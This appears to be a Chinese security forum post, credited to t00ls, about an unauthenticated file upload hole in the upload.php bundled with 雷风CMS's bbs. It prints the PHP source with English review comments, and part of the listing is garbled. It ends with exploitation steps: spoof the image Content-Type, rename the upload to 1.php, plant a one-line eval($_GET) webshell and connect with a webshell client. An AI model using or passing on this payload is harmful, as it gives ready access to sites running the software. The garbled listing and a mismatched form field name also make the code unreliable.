雷风CMS默认带有一个bbs，bbs根目录下默认有一个upload.php。
源码如下:

01 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "upload/2011/5/201105291829080676.gif) repeat-x;} 

14 </style> 

15 <body> 

16 <? 

// Image upload handler, reached via upload.php?action=load.
// NOTE(review): no authentication or session check appears anywhere in this handler, so the
// checks below are the only controls between an anonymous request and a file landing in the
// web-served upload_img/ tree.
// "p_w_picpath" throughout this listing appears to be an extraction artifact for the word
// "image" (so getp_w_picpathsize() is presumably getimagesize()) — confirm against the original file.
17 if($_GET["action"]=="load"){ 

// Allow-list of accepted MIME strings. It is compared below against $file["type"], which is the
// Content-Type the client declared for the multipart part — a self-declared value, so this
// comparison is not a security control. Server-side detection of the content type is needed.
18     $uptypes = array('p_w_picpath/jpg','p_w_picpath/jpeg','p_w_picpath/png','p_w_picpath/pjpeg','p_w_picpath/gif','p_w_picpath/bmp','p_w_picpath/x-png'); 

// Public URL prefix reconstructed from the request. The scheme is hard-coded to http, and
// SERVER_NAME may reflect the client's Host header depending on server configuration; it is only
// used to build the path echoed back to the caller.
19         $url     = "http://".$_SERVER["SERVER_NAME"]. $_SERVER["PHP_SELF"]; 

// Keep everything before "/upload.php", then split it into path segments.
20         $url     = explode("/upload.php",$url); 

21         $url     = explode("/",$url[0]); 

22         $max_file_size = 2*(1024*1024); // upload size limit, in bytes 

23   

// Destination directory, relative to this script — i.e. inside the document root.
24         $root    = "upload_img"; 

25           

// One sub-directory per month.
26         $folder  = date("Y-m",time()); 

// rand() is not a CSPRNG and the stored name is time().$authnum, so names are largely
// predictable; the full path is echoed back to the uploader below anyway.
27         $authnum = rand()%100000; 

28           

29         if ($_SERVER['REQUEST_METHOD'] == 'POST'){  

// tmp_name is an unquoted bare constant, i.e. the string "tmp_name" via the undefined-constant
// fallback (a notice in PHP 7, a fatal Error in PHP 8). is_uploaded_file() only confirms the
// path came from this request's upload; it says nothing about the content.
30             if (!is_uploaded_file($_FILES["file"][tmp_name])){ 

31                     exit("<script language=javascript>alert('Please select one file to upload(请选择上传文件)!');history.go(-1);</script>"); 

32                 } 

33                 $file = $_FILES["file"]; 

34                 if($max_file_size < $file["size"]){// check file size 

35                     exit("<script language=javascript>alert('Max file size of $max_file_size bytes exceeded(文件大小不能超过2M)!');history.go(-1);</script>"); 

36                 } 

// Only the client-declared Content-Type is checked; neither the file extension nor the
// actual content is validated anywhere in this handler. The alert text promises an
// extension check that the code does not perform.
37                 if(!in_array($file["type"],$uptypes)){// check file type 

38                     exit("<script language=javascript>alert('Type of the file must be \".jpg/.jpeg/.bmp/.gif/png\"(文件后缀只能是.jpg/.jpeg/.bmp/.gif/png)!');history.go(-1);</script>"); 

39                 } 

// Errors are hidden here: @ suppresses file_exists() warnings and mkdir()'s return value is
// ignored, so a failed directory creation only surfaces when move_uploaded_file() fails below.
// mkdir() is called with its default mode (0777 before umask).
40             if(!@file_exists($root."/".$folder)) mkdir($root."/".$folder); 

41                   

42             $filename   = $file["tmp_name"]; 

// $p_w_picpath_size (presumably the getimagesize() result) is assigned but never read in this
// handler, so the one content-based check that would reject non-image data has no effect.
43             $p_w_picpath_size = getp_w_picpathsize($filename); 

// The stored extension is taken verbatim from the client-supplied original filename with no
// allow-list, and the file is written under the web-served upload_img/ tree. This is the
// arbitrary-upload flaw: derive the extension from a server-side allow-list keyed on the
// detected image type, and/or deny script execution in upload_img/. If the name has no
// extension, $pinfo['extension'] is unset (notice) and the stored name ends in a bare ".".
44             $pinfo      = pathinfo($file["name"]); 

45                 $ftype      = $pinfo['extension']; 

46                 $fileinfo   = $root."/".$folder."/".time().$authnum.".".$ftype; 

47                   

// $overwrite is not assigned anywhere in this file, so "$overwrite != true" is always true and
// the condition reduces to file_exists().
48                 if (file_exists($fileinfo) && $overwrite != true){  

49                     exit("<script language=javascript>alert('同名文件已经存在了!');history.go(-1);</script>"); 

50                 } 

51                 if(!move_uploaded_file ($filename,$fileinfo)){ 

52                    exit("<script language=javascript>alert('移动文件出错!');history.go(-1);</script>"); 

53                 } 

54             $pinfo=pathinfo($fileinfo); 

// basename is again an unquoted bare constant (see tmp_name above).
55             $fname=$pinfo[basename]; 

56                   

// Rebuild the public URL path: strip any leading "../" from $root, then copy
// count($url)-count($root)+1 leading request-path segments and append the last $root segment.
// Index arithmetic on the explode() results is not validated.
57                 $root = explode("../",$root); 

58                 $urlpath = ""; 

59                 for($i=0;$i<count($url)-count($root)+1;$i++){ 

60                         $urlpath .= $url[$i]."/"; 

61                 } 

62                 $urlpath .= $root[count($root)-1]."/"; 

63                   

64                 $picture  = $urlpath.$folder."/".$fname; 

// $id comes straight from POST (fallback "picture") and $picture carries the client-chosen
// extension. Both are interpolated into inline JavaScript and into a URL below with no escaping
// (json_encode() / urlencode() per context), so this is a reflected script-injection sink in
// addition to the upload flaw. The redirect puts $id into the query string, which the form
// further down echoes unescaped as well.
65             $id = trim($_POST["id"]); 

66                 if(!$id) $id = "picture"; 

67                   

68                 echo "<script language='javascript'>\r\n"; 

69             echo "window.parent.document.getElementById('$id').value='$picture';\r\n"; 

70             echo "window.location.href='upload.php?id=$id';\r\n"; 

71             echo "</script>\r\n"; 

72         } 

// Stop here for action=load so the form below is never rendered in that case.
73         exit; 

74 } 

75 ?> 

<!-- Upload form. NOTE(review): the hidden "id" field writes $_GET["id"] into an attribute value
     with no htmlspecialchars(), a reflected XSS sink; the handler above redirects back to
     upload.php?id=... with the POSTed value, so the two reflections chain. The file input is
     declared with id="iFile" (name="file"), while checkform() below looks up
     getElementById("file"). -->
76 <form action="upload.php?action=load" method="post" enctype="multipart/form-data" name="upform" onSubmit="return checkform();"> 

77         <input name="file" type="file" class="input" id="iFile" size="18" /> 

78         <input name="Submit" type="submit" class="iButton" value="上 传" /> 

79         <input type="hidden" name="id" id="id" value="<?=$_GET["id"]?>"> 

80 </form> 

81 <script language="javascript"> 

// Client-side pre-check only; it does not constrain what the server accepts.
// NOTE(review): the file input is declared with id="iFile" (name="file"), so
// getElementById("file") returns null and reading .value throws. The inline onSubmit
// handler then yields no "false", so the submission is not blocked. When a file is
// selected the function falls off the end and returns undefined, which also submits.
82 function checkform(){ 

83     if(document.getElementById("file").value == ""){ 

84                 alert("Please select one file to upload(请选择上传文件)!"); 

85                 return false; 

86         } 

87 } 

88 </script> 

89 </body> 

90 </html>
很明显，这里对上传文件没有任何有效的验证和过滤。
利用方法:
抓包
改包如下:
Content-Disposition: form-data; name="files"; filename="1.php"
Content-Type: p_w_picpath/jpeg

Gif89a<?
eval ($_GET[SB]);
?>


直接上菜刀就可以了

转自:t00ls